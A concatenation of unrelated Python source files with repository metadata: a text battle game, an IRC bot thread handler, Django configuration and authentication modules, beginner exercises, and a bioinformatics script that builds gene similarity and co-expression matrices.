enemy_health = 1000
# determine whose turn it is
turn = random.randint(1, 2) # heads or tails
if turn == 1:
player_turn = True
enemy_turn = False
print("\nYou strike first. Swing it like you mean it!")
else:
player_turn = False
enemy_turn = True
print("\nDemon Knight sneaks up on you. Watch out!")
print(f'''
Player Health: {player_health}
Enemy Health: {enemy_health}
''')
# set up the main game loop
while (player_health != 0 or enemy_health != 0):
# determine if heal has been used by the player. Resets false each loop.
heal_up = False
miss = False # determine if the chosen move will miss.
# create a dictionary of the possible moves and randomly select the damage it does when selected
moves = {"Excalibur": random.randint(150, 230),
"Divine Light": random.randint(100, 350),
"Potion": random.randint(180, 270)}
if player_turn:
print('''Choose your next move:
(1) Excalibur (Deals 150-230 Damage)
(2) Divine Light (Deals 100-350 Damage)
(3) Potion (Restores 180-270 Health)
''')
player_move = int(input("> ").lower())
move_miss = random.randint(1, 5) # 20% of missing
if move_miss == 1:
miss = True
else:
miss = False
if miss:
player_move = 0 # player misses and deals no damage
print("\nTides turn for the worse: You missed!")
else:
if player_move == (1):
player_move = moves["Excalibur"]
print("\nYou swing your mighty sword, Excalibur. It deals %s damage." % (
player_move))
elif player_move == (2):
player_move = moves["Divine Light"]
print("\nYou call to the heavens to show its Divine Light! It deals %s damage." % (
player_move))
elif player_move == (3):
heal_up = True # heal activated
player_move = moves["Potion"]
print("\nYou chug a Potion and throw the bottle in the reycling bin. It heals %s damage." % (
player_move))
else:
print(
"\nINVALID ENTRY! Please choose using the numbers: 1, 2, or 3")
continue
else: # computer turn
move_miss = random.randint(1, 5)
if move_miss == 1:
miss = True
else:
miss = False
if miss:
enemy_move = 0 # the computer misses and deals no damage
print("\nThe gods have blessed you! Your opponent misses!")
else:
if enemy_health > 300:
if player_health > 750:
enemy_move = moves["Excalibur"]
print("\nDemon Knight swings her Devilish Dagger. It deals %s damage." % (
enemy_move))
elif player_health > 350 and player_health <= 750: # computer decides whether to go big or play it safe
imoves = ["Excalibur", "Divine Light"]
imoves = random.choice(imoves)
enemy_move = moves[imoves]
print("\nDemon Knight uses %s. It deals %s damage" %
(imoves, enemy_move))
elif player_health <= 350:
enemy_move = moves["Divine Light"] # FINISH HIM!
print("\nDemon Knight opens the ground and releases Hellfire. It deals %s damage." % (
enemy_move))
else: # if the computer has less than 300 health, there is a 50% chance they will heal
heal_or_fight = random.randint(1, 2)
if heal_or_fight == 1:
heal_up = True
enemy_move = moves["Potion"]
print(
"\nDemon Knight uses a bandage. It heals %s damage." % (enemy_move))
else:
if player_health > 750:
enemy_move = moves["Excalibur"]
print("\nDemon Knight swings her Devilish Dagger. It deals %s damage." % (
enemy_move))
elif player_health > 350 and player_health <= 750:
imoves = ["Excalibur", "Divine Light"]
imoves = random.choice(imoves)
enemy_move = moves[imoves]
print("\nDemon Knight uses %s and deals %s " %
(imoves, enemy_move))
elif player_health <= 350:
# FINISH HIM!
enemy_move = moves["Divine Light"]
print("\nDemon Knight opens the ground and releases Hellfire. It deals %s damage." % (
enemy_move))
if heal_up:
if player_turn:
player_health += player_move
if player_health > 1000:
player_health = 1000 # cap max health at 1000. No over healing!
else:
enemy_health += enemy_move
if enemy_health > 1000:
enemy_health = 1000
else:
if player_turn:
enemy_health -= player_move
if enemy_health < 0:
enemy_health = 0 # cap minimum health at 0
winner = "Player"
break
else:
player_health -= enemy_move
if player_health < 0:
player_health = 0
winner = "Enemy"
break
print(f'''
Player Health: {player_health}
Enemy Health: {enemy_health}
''')
# switch turns
player_turn = not player_turn
enemy_turn = not enemy_turn
# once main game while loop breaks, determine winner and congratulate
if winner == "Player":
print("\nWe have a Champion! You've defeated Demon Knight, saved the kingdom, and the King gave you a discount on your taxes. Nice!")
else:
print("\nYou have fallen in battle. The land is in ruins... Shucks.")
print("\nGo for another round? (Y/N)")
answer = input("> ").lower()
if answer not in ("yes", "y"):
play_again = False
story()
| [
"jtroinacoding@gmail.com"
] | jtroinacoding@gmail.com |
7b0a346a7c56723dcae34715480a4cc1df0a10b2 | 91d931581891ca2f21403090f8192296f11bf6f4 | /utils/threads.py | 24c5e0fc538d7d94d6b76021c4c081fe55003fb1 | [
"MIT"
] | permissive | svkampen/James | b496e22b218cefa8b419099cf8cb8a7f5aa1c761 | dc2f6df19aeb8278ef5aabc2956e225f3234d693 | refs/heads/master | 2021-01-02T09:38:23.158331 | 2018-07-01T02:07:36 | 2018-07-01T02:07:36 | 3,297,746 | 0 | 1 | null | 2015-04-19T15:24:32 | 2012-01-29T15:13:35 | Python | UTF-8 | Python | false | false | 1,193 | py | """
Threads module
"""
from threading import Thread
from queue import Queue
import traceback
import sys
class HandlerThread(Thread):
def __init__(self, bot):
self.bot = bot
self.queue = Queue()
super().__init__()
def guru_meditate(self, chan, exc_info):
exc_name = str(exc_info[0]).split("'")[1]
exc_args = exc_info[1].args[0]
exc_traceback = exc_info[2]
outp = traceback.format_tb(exc_traceback)
lineno = outp[-1].split(', ')[1][5:]
file = ' '.join(outp[-1].split('"')[1].rsplit("/", 2)[-2:])
out = "⌜ \x02\x03such \x034%s \x03so \x034%s\x03\x02 in \x034%s\x03 \x02line\x0304 %s\x03\x02 ⌟" % (
exc_name, exc_args, file, lineno)
self.bot.msg(chan, out)
def run(self):
while True:
try:
func = self.queue.get()
func_chan = func.args[2]
func()
except BaseException as e:
if not isinstance(e, SystemExit):
traceback.print_exc()
self.guru_meditate(func_chan, sys.exc_info())
def handle(self, function):
self.queue.put(function)
| [
"sam@tehsvk.net"
] | sam@tehsvk.net |
a6573a47a9197fa74a3b1d54ce847a70a26f6592 | 01e8e67466b79d352d979ae24fc861be7e9b8b48 | /backup_brain/wsgi.py | 936fb7b14f5cc3ad36354ed46e08a9536770da59 | [] | no_license | lucasousa/backup-brain | dcc2316d5236716ec821afb4489a87fcd1c5500a | a68ee46de4463b22fb23e075d89db465a247649b | refs/heads/master | 2022-12-23T22:18:10.629705 | 2020-10-04T19:24:35 | 2020-10-04T19:24:35 | 281,097,015 | 5 | 2 | null | 2020-10-04T19:24:36 | 2020-07-20T11:23:26 | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for backup_brain project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backup_brain.settings')
application = get_wsgi_application()
| [
"marcosbarretopaulo@gmail.com"
] | marcosbarretopaulo@gmail.com |
11d98c74eb38bbdb8bdd909712e62ed68d864dc5 | 0030e377308cdbcf520575670e18050a23bd2bd4 | /homework_classes.py | 60fba6d9379b99b8cd73e3e8ff602a3977d29f2e | [] | no_license | xx70x/py-16_hw | 5b629d8a5d2530bdccee146e0f28f8cfc6a968aa | 3941d88930cf52bddcc4c3aa1c5b5c178344acf7 | refs/heads/master | 2020-03-18T18:10:43.304878 | 2018-05-27T19:34:56 | 2018-05-27T19:34:56 | 135,075,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | # Необходимо реализовать классы животных на ферме:
# Коровы, козы, овцы, свиньи;
# Утки, куры, гуси.
# Условия:
# Должен быть один базовый класс, который наследуют все остальные животные.
# Базовый класс должен определять общие характеристики и интерфейс.
class Fauna():
def __init__(self, name, size):
self.name = name
self.size = size
print(self.name, self.size)
class Birds(Fauna):
name_bird = ['Утки', 'Куры', 'Гуси']
def __init__(self, name_bird):
self.name_bird = name_bird
Fauna.__init__(self, name_bird, 'small')
class Animal(Fauna):
name_animal = ['Коровы', 'Козы', 'Овцы', 'Свиньи']
def __init__(self, name_animal):
self.name_animal = name_animal
Fauna.__init__(self, name_animal, 'big')
ducks = Birds('Утки')
chickens = Birds('Куры')
geese = Birds('Гуси')
Cows = Animal('Коровы')
Goats = Animal('Козы')
Sheep = Animal('Овцы')
Pigs = Animal('Свиньи')
# ДЗ пока не готово
| [
"xx70x@ya.ru"
] | xx70x@ya.ru |
4749a3c0908091555e12a2d95d89a42aa01f83f6 | b1571f4ee376d789b8094777fd81c4fb47a89cf1 | /AtCoder/練習/Beginners Selection/ABC087B.py | 23846c48ce3cc1eb755514d5511a6d7951002ae6 | [] | no_license | hiroyaonoe/Competitive-programming | e49e43f8853602ba73e658cab423bd91ebbe9286 | 2949e10eec3a38498bedb57ea41a2491916bab1c | refs/heads/master | 2021-06-23T21:56:33.232931 | 2021-05-30T15:27:31 | 2021-05-30T15:27:31 | 225,863,783 | 2 | 0 | null | 2020-06-14T17:54:28 | 2019-12-04T12:37:24 | Python | UTF-8 | Python | false | false | 595 | py | a=int(input())
b=int(input())
c=int(input())
x=int(input())
cnt=0
for i in range(a+1):
for j in range(b+1):
for k in range(c+1):
if x == 500*i+100*j+50*k:cnt+=1
print(cnt)
'''
coinA=min(a,x//500)
coinB=min(b,(x-coinA*500)//100)
coinC=min(c,(x-coinB*100)//50)
cnt=0
changeB=coinB
changeC=coinC
if 500*coinA+100*coinB+50*coinC>=x:
while coinA>=0:
while 0<=changeB<=b:
if 0<=changeC<=c:
cnt+=1
changeB-=1
changeC+=2
changeB=coinB
changeC=coinC
coinA-=1
changeB+=5
print(cnt)
''' | [
"onoehiroya@gmail.com"
] | onoehiroya@gmail.com |
ae7f384939e787900d1895652f876198cc9cf37a | c3fc7e1c2e20455c6913b545bb67af55a7fb7099 | /selector/authbackend.py | 1f106c555174569d29625f8e83d214660b5afb3a | [
"MIT"
] | permissive | mpassid/MPASSid-connect | aeb64f66804419dd2e70f6bf76aedb422b607ce2 | 61fafe0ffe02e8fa363473afd261dd5bc48aa9af | refs/heads/master | 2021-05-26T05:14:28.591716 | 2019-02-13T10:11:15 | 2019-02-13T10:11:15 | 127,510,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,182 | py | # -*- encoding: utf-8 -*-
# The MIT License (MIT)
#
# Copyright (c) 2015 Haltu Oy, http://haltu.fi
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import logging
from django.contrib.auth.backends import ModelBackend
from selector.models import User
from selector import settings
LOG = logging.getLogger(__name__)
class ShibbolethBackend(ModelBackend):
def authenticate(self, **credentials):
if not 'request_meta' in credentials:
return None
meta = credentials['request_meta']
if not 'HTTP_MPASS_OID' in meta:
LOG.debug('no HTTP_MPASS_OID in request.META')
return None
uid = meta['HTTP_MPASS_OID']
LOG.debug('ShibbolethBackend.authenticate',
extra={'data': {'uid': uid}})
try:
# TODO Check also the organisation
user = User.objects.get(username=uid)
except User.DoesNotExist:
if settings.CREATE_SAML_USER:
user_data = {
'username': uid,
'first_name': meta.get('HTTP_MPASS_GIVENNAME', None),
'last_name': meta.get('HTTP_MPASS_SURNAME', None),
}
user = User.objects.create(**user_data)
else:
return None
return user
| [
"raine.rapo@gmail.com"
] | raine.rapo@gmail.com |
850406838a65e0394c64895605227d65b25e1812 | 70d35bcad8c3fc4aadfd5895e3e7c5909f667c7e | /mysite/mysite/settings.py | c2253d8a5124222d0d1ef82bb46196a4f2904f5c | [] | no_license | orestispanago/Django-rest | 06ad28fb15f50d3b08bb404c24fce8ba7913842f | 1429d809d16cb441df67ab7165e8835e107ba54a | refs/heads/master | 2023-02-04T05:42:56.147913 | 2020-12-29T10:40:13 | 2020-12-29T10:40:13 | 324,542,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,114 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i+9tdysw=s(2i#(sf_1fus8e=*y=^s&1-8=wxu@5e@!*%%k^0-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'rest_framework',
'myapi.apps.MyapiConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"orestispanago@gmail.com"
] | orestispanago@gmail.com |
aea56583114181ae10f2a4ede81ab4a9348b68c7 | 7e921c186c5bb76ecdec53c23c93ab1a815ef435 | /tests/conftest.py | d26f569f209311ddda9c845b2ebb5586750b283a | [] | no_license | Serufim/yandex_backend | 7db419719a57f0f44b7522d9e58497d9db4e1992 | f85a278f956f3a660ce9edcc4e6e5571bd5a18a2 | refs/heads/master | 2020-07-05T05:32:47.401299 | 2019-08-19T19:28:11 | 2019-08-19T19:28:11 | 202,538,684 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,344 | py | import pytest
from api.app import init_app
from api.settings import BASE_DIR, get_config
from init_db import (
setup_db,
teardown_db,
create_tables,
drop_tables,
sample_data
)
TEST_CONFIG_PATH = BASE_DIR / 'config' / 'api_test.yaml'
@pytest.fixture
async def cli(loop, aiohttp_client, db):
app = await init_app(['-c', TEST_CONFIG_PATH.as_posix()])
return await aiohttp_client(app)
@pytest.fixture(scope='module')
def db():
test_config = get_config(['-c', TEST_CONFIG_PATH.as_posix()])
setup_db(test_config['postgres'])
yield
teardown_db(test_config['postgres'])
@pytest.fixture
def tables_and_data():
create_tables()
sample_data()
yield
drop_tables()
@pytest.fixture(params=[
("citizen_id", [-1, None, 'test']),
("apartment", [-1, None, 'test']),
("town", ["", 1, None]),
("street", ["", 1, None]),
('aliens', ["All your base are belong to us"]),
('birth_date', '31.22.2015'),
("building", ["", 1, None]),
("gender", ["Трансформер"]),
("relatives", [[2, 3, 1]],),
("relatives", [[3]]),
("relatives", [[2, 3, 500]]),
("relatives", [[]]),
])
async def param_test_insert_and_update(request):
"""Тестовый набор данных для вставки пользователей"""
return request.param
| [
"serufim97@yandex.ru"
] | serufim97@yandex.ru |
a5211b078bee3486f2f0f8630b3c79b6da2509ae | a89d97dca06d11db19d63c05922ca18506931a5e | /medibloc_coding_1.py | f3caeadedb77844c0ae70f056e8e81b2340372ed | [] | no_license | felixdies/leetcode | 18c4bf8a28dc2fa1c78ab5f917405e0bf7058cc2 | dbb51646880def3a69c313a1992ef03946839aaf | refs/heads/master | 2020-03-24T13:33:59.238126 | 2018-07-31T03:44:22 | 2018-07-31T03:44:22 | 142,746,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | """
2018.07.30
메디블록 코딩 인터뷰 1번 문제
홀수 마방진 그리기
인터뷰 때에는 checkEdge(), next() 함수를 분리 하지 않고
하나의 스크립트로 짜려고 시도하면서 긴 시간을 소요했고,
결과 코드도 깔끔하지 못했음.
"""
W = 11
H = 11
ans = [[0]*W for x in range(H)]
def checkEdge(i,j):
if i==-1: i=H-1
if j==W: j=0
return (i,j)
def next(i,j):
ni=i-1
nj=j+1
(ni, nj) = checkEdge(ni, nj)
if ans[ni][nj] != 0:
return checkEdge(i, j-1)
else:
return (ni, nj)
i=H//2
j=W-1
num=1
while num<=W*H:
ans[i][j] = num
i, j = next(i, j)
num += 1
for a in ans: print(sum(a))
for a in ans:
print(a)
| [
"johnpark@ebay.com"
] | johnpark@ebay.com |
c3d4af16874f5a1eb418edd5730a4ef05849e80f | aa4b225b20c4ef6fbb8dea7c97f94d7e2185078b | /indeed.py | b19077405475abe12cbb9a7363cf7e856a7f5324 | [] | no_license | joe-habel/IndeedScraperGUI | 2436baed8d60044fb369063f6c1820fa30e4ad60 | 5f7169d8ef7d165c54622f09400d92c8b5835eb8 | refs/heads/master | 2020-04-16T04:54:57.412041 | 2019-01-11T21:24:13 | 2019-01-11T21:24:13 | 165,286,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,215 | py | import requests
from bs4 import BeautifulSoup
import time
class job_posting(object):
def __init__(self,title,company,loc,date,link):
self.title = title
self.company = company
self.loc = loc
self.date = date
self.link = 'https://www.indeed.com/' + link
def to_dict(self):
return {
'Title' : self.title,
'Company' : self.company,
'Location' : self.loc,
'Date' : self.date,
'Link' : self.link
}
def generate_url(position,location=None,state=None):
position = position.split()
title = ''
loc = ''
for i, word in enumerate(position):
title += word
if i < len(position) - 1:
title += '+'
if location is not None:
city = location.split()
for i, word in enumerate(city):
loc += word
if i < len(location) - 1:
loc += '+'
loc = loc + '%2C+' + state
url = 'https://www.indeed.com/jobs?q=%s&l=%s&start='%(title,loc)
else:
url = 'https://www.indeed.com/jobs?q=%s&start='%(title)
return url
def get_job_postings(url,max_results):
jobs = []
for start in range(0, max_results, 15):
page = requests.get(url+str(start))
soup = BeautifulSoup(page.text, 'html.parser')
time.sleep(.5)
for div in soup.find_all(name='div', attrs={'class':'row'}):
company = div.find_all(name='span', attrs={'class':'company'})
title_link = div.find_all(name='a', attrs={'data-tn-element':'jobTitle'})
date = div.find_all(name='span', attrs={'class':'date'})
loc = div.find_all(name='span', attrs={'class':'location'})
if len(date) < 1 or len(loc) < 1 or len(company) < 1 or len(title_link) < 1:
continue
else:
jobs.append(job_posting(title_link[0].text,company[0].text.strip(),loc[0].text.strip(),date[0].text.strip(),title_link[0]['href']))
return jobs
def get_jobs(position,location,state,max_postings):
url = generate_url(position,location,state)
jobs = get_job_postings(url,max_postings)
return jobs
def min_to_day(minutes):
return float(minutes)/(60.*24)
def hour_to_day(hours):
return float(hours)/(24.)
def sort_by_date(jobs):
time_dict = {}
for job in jobs:
date = job.date
date = date.split()
if date[1][0] == 'm':
val = min_to_day(date[0])
elif date[1][0] == 'h':
val = hour_to_day(date[0])
else:
if date[0].find('+') >= 0:
continue
else:
val = int(date[0])
time_dict[val] = job
time_sorted = []
for date in sorted(time_dict.keys()):
time_sorted.append(time_dict[date])
return time_sorted
def job_search(position,max_postings=100,location=None,state=None):
jobs = get_jobs(position,location,state,max_postings)
sort_jobs = sort_by_date(jobs)
return sort_jobs
| [
"noreply@github.com"
] | noreply@github.com |
a09341c86e8173d91eda01c6d82ec77bb981f957 | ccdf3dffdc390b774ac3e6ba81c16dc48bc9a5fb | /notebooks/fct_network_functions.py | c5fd019ef04e663aa144ce32b34847f62fcc8c07 | [] | no_license | CCSB-DFCI/HuRI_paper | 90a69521e41d2a8dad9987895930ecd0ce6504b6 | 16c57919f4e0c3d1a78edf90c105ed42d3022f8f | refs/heads/master | 2022-12-15T19:58:33.625633 | 2020-09-14T17:07:06 | 2020-09-14T17:07:06 | 226,145,775 | 25 | 8 | null | 2022-08-23T18:07:00 | 2019-12-05T16:38:19 | Jupyter Notebook | UTF-8 | Python | false | false | 8,715 | py | # script that contains code to generate functional profile matrices, some other scripts to process functional
# annotation data and some code to facilitate analysis and plotting of data by doing some pre-calculations
import numpy
import os
import sys
import pandas
import database_utils
# function that generates a matrix of all proteins in HuRI by all proteins in HuRI with their pairwise
# seq similarity
def generate_seq_similarity_matrix(cursor,path,outfile):
print('get a mapping file between orf ids and gene ids')
orf_gene_map_dict = {}
query = """select distinct orf_id,ensembl_gene_id
from horfeome_annotation_gencode27.orf_class_map_ensg
where orf_class in ("pcORF","npcORF")"""
cursor.execute(query)
for row in cursor:
orf_id = str(row[0])
gene_id = row[1].split('.')[0]
if orf_id not in orf_gene_map_dict:
orf_gene_map_dict[orf_id] = []
orf_gene_map_dict[orf_id].append(gene_id)
print('read in the alignment file and map to gene IDs')
seq_align_dict = {}
file1 = open(path + 'hi2018_paper.muscle_alignment.txt','r')
count = 0
for line in file1:
tab_list = str.split(line[:-1],'\t')
orf_id1 = tab_list[0]
orf_id2 = tab_list[1]
if orf_id1 != 'orf_id1':
seq_ident = float(tab_list[2])/float(tab_list[6])
if orf_id1 in orf_gene_map_dict and orf_id2 in orf_gene_map_dict:
for gene_a in orf_gene_map_dict[orf_id1]:
for gene_b in orf_gene_map_dict[orf_id2]:
pair = tuple(sorted([gene_a,gene_b]))
if pair not in seq_align_dict:
seq_align_dict[pair] = 0
seq_align_dict[pair] = max(seq_align_dict[pair],seq_ident)
count += 1
if count % 100000 == 0:
print(count)
file1.close()
print('get all gene ids')
gene_ids = sorted(list(set([tup[0] for tup in seq_align_dict.keys()] + [tup[1] for tup in seq_align_dict.keys()])))
print('create a matrix of seq similarities')
matrix = numpy.ones((len(gene_ids),len(gene_ids)),dtype=float)
for pair,seq_ident in seq_align_dict.items():
index_a = gene_ids.index(pair[0])
index_b = gene_ids.index(pair[1])
matrix[index_a,index_b] = seq_ident
matrix[index_b,index_a] = seq_ident
print('write out the matrix')
target = open(outfile,'w')
target.write('\t' + '\t'.join(gene_ids) + '\n')
for i in range(len(gene_ids)):
target.write(gene_ids[i] + '\t' + '\t'.join([str(v) for v in matrix[i,]]) + '\n')
target.close()
# function that processes the co-fitness profile matrix by mapping it to Ensembl gene IDs and dealing with
# changes to the dataset because of the mapping
def map_co_fitness_matrix_to_gene_ids(cursor,co_fitness_matrix_file,outfile):
# get a mapping dict between gene symbols and gene IDs
query = """select distinct ensembl_gene_id_short,symbol from horfeome_annotation_gencode27.gencode2entrez"""
cursor.execute(query)
symbol_id_map_dict = {}
for row in cursor:
gene_id = row[0]
symbol = row[1]
symbol_id_map_dict[symbol] = gene_id
file1 = open(co_fitness_matrix_file,'r')
for line in file1:
gene_names = line[:-1].split('\t')[1:]
break
matrix = numpy.loadtxt(co_fitness_matrix_file,dtype='float',delimiter='\t',skiprows=1,usecols=range(1,len(gene_names)+1))
gene_ids = []
indices = []
for i,gene_name in enumerate(gene_names):
if gene_name in symbol_id_map_dict:
gene_ids.append(symbol_id_map_dict[gene_name])
indices.append(i)
else:
gene_ids.append(None)
target = open(outfile,'w')
target.write('\t' + '\t'.join(filter(lambda v: v is not None,gene_ids)) + '\n')
for i in indices:
target.write(gene_ids[i] + '\t' + '\t'.join([str(matrix[i,v]) for v in indices]) + '\n')
target.close()
# function that reads in the files from SEEK DB to generate one PCC matrix restricted to proteins in HI-union
def generate_SEEK_matrix(SEEK_path,cursor,outfile_prefix):
# get the set of genes to be included in the expression matrix
query = """select distinct a.ensembl_gene_id from
horfeome_annotation_gencode27.orf_class_map_ensg a,
horfeome_annotation_gencode27.gencode_transcript_annotation b,
(select distinct ad_orf_id orf_id from hi_ref_retest.retest where standard_batch in ("Hs15","Hs14") and final_score="1"
union
(select distinct db_orf_id from hi_ref_retest.retest where standard_batch in ("Hs15","Hs14") and final_score="1")) as c
where a.in_new_space_3=1 and a.orf_class='pcORF' and a.ensembl_gene_id=b.ensembl_gene_id and b.gene_type="protein_coding" and a.orf_id=c.orf_id
union
(select distinct a.ensembl_gene_id from
(select interactor_a ensembl_gene_id from
hi_ref.huri_exp_info
union
(select interactor_b from
hi_ref.huri_exp_info
)) as a,
horfeome_annotation_gencode27.gencode_transcript_annotation b,
horfeome_annotation_gencode27.orf_class_map_ensg c
where a.ensembl_gene_id=b.ensembl_gene_id and b.gene_type='protein_coding' and a.ensembl_gene_id=c.ensembl_gene_id and c.orf_class='pcORF')"""
cursor.execute(query)
huri_genes = set([row[0].split('.')[0] for row in cursor])
print('Number of HI-union genes:', len(huri_genes))
# get a mapping between gene IDs and Ensembl gene ids
query = """select distinct entrez_gene_id,ensembl_gene_id_short from horfeome_annotation_gencode27.gencode2entrez"""
cursor.execute(query)
map_dict = {}
for row in cursor:
map_dict[str(row[0])] = row[1]
print('Number of geneIDs mapped to Ensg IDs:', len(map_dict))
# get set of gene IDs used in SEEK as intersection between file names and row names in one file and map those to ensemble gene ids
files = os.listdir(SEEK_path)
gene_ids = set([s.split('.')[0] for s in files])
file1 = open(SEEK_path + files[0],'r')
entries = file1.readlines()
gene_ids = list(gene_ids.intersection(set([line.split('\t')[0] for line in entries])))
matched_gene_ids = []
matched_ensg_ids = []
for gene_id in gene_ids:
if gene_id in map_dict and map_dict[gene_id] in huri_genes and map_dict[gene_id] not in matched_ensg_ids:
matched_gene_ids.append(gene_id)
matched_ensg_ids.append(map_dict[gene_id])
print('Number of retained ensg IDs:', len(matched_ensg_ids))
# get a dict that maps from gene ID to index in matrix
id_index_dict = dict([(matched_gene_ids[i],i) for i in range(len(matched_gene_ids))])
# fill a matrix with the PCCs for the selected list of gene IDs
print('Start filling the PCC matrix')
matrix = numpy.zeros((len(matched_ensg_ids),len(matched_ensg_ids)),dtype=float)
for f,file_name in enumerate(files):
if f % 1000 == 0:
print(f)
gene_a = file_name.split('.')[0]
if gene_a in id_index_dict:
file1 = open(SEEK_path + file_name,'r')
entries = file1.readlines()
file1.close()
for line in entries:
tab_list = str.split(line[:-1],'\t')
gene_b = tab_list[0]
pcc = float(tab_list[1])
if gene_b in id_index_dict:
matrix[id_index_dict[gene_a],id_index_dict[gene_b]] = pcc
matrix[id_index_dict[gene_b],id_index_dict[gene_a]] = pcc
# write out
print('Write text')
outfile_text = outfile_prefix + '.txt'
target = open(outfile_text,'w')
target.write('\t' + '\t'.join(matched_ensg_ids) + '\n')
for i in range(len(matched_ensg_ids)):
target.write(matched_ensg_ids[i] + '\t' + '\t'.join([str(v) for v in matrix[i,:]]) + '\n')
target.close()
print('Write binary')
outfile_binary = outfile_prefix + '.npy'
numpy.save(outfile_binary,matrix)
def count_edges_per_cutoff(nw_name,num_rand,inpath,outpath):
cutoffs = [0.001,0.01] + [i/10.0 for i in range(1,11)]
count_matrix = numpy.zeros((num_rand,len(cutoffs)),dtype='int')
for r in range(num_rand):
if r % 10 == 0:
print(r)
network_file = inpath + nw_name + '/' + nw_name + '_rand_network_' + str(r) + '.txt'
PSN = pandas.read_table(network_file,header=0)
for c,cutoff in enumerate(cutoffs):
count_matrix[r][c] = PSN.loc[PSN['Jaccard_similarity'] >= cutoff,].shape[0]
outfile = outpath + nw_name + '_rand_edge_count_per_JScutoff.npy'
numpy.save(outfile,count_matrix)
if __name__ == '__main__':
connect = database_utils.get_connection()
cursor = connect.cursor()
path = '../data/katjas_data/PSN_analysis/'
mode = sys.argv[1]
if mode == '1':
outfile = path + 'seq_similarity_matrix.txt'
generate_seq_similarity_matrix(cursor,path,outfile)
elif mode == '2':
co_fitness_matrix_file = path + 'avana_2017_dep_corr.tsv'
outfile = path + 'avana_2017_dep_corr_ENSG_ID.tsv'
map_co_fitness_matrix_to_gene_ids(cursor,co_fitness_matrix_file,outfile)
elif mode == '4':
SEEK_path = path + 'results.human.single.gene.cor/'
outfile_prefix = path + 'SEEK_matrix'
generate_SEEK_matrix(SEEK_path,cursor,outfile_prefix)
elif mode == '6':
nw_name = sys.argv[2]
num_rand = int(sys.argv[3])
inpath = path
outpath = path
count_edges_per_cutoff(nw_name,num_rand,inpath,outpath)
| [
"lambourne.luke@gmail.com"
] | lambourne.luke@gmail.com |
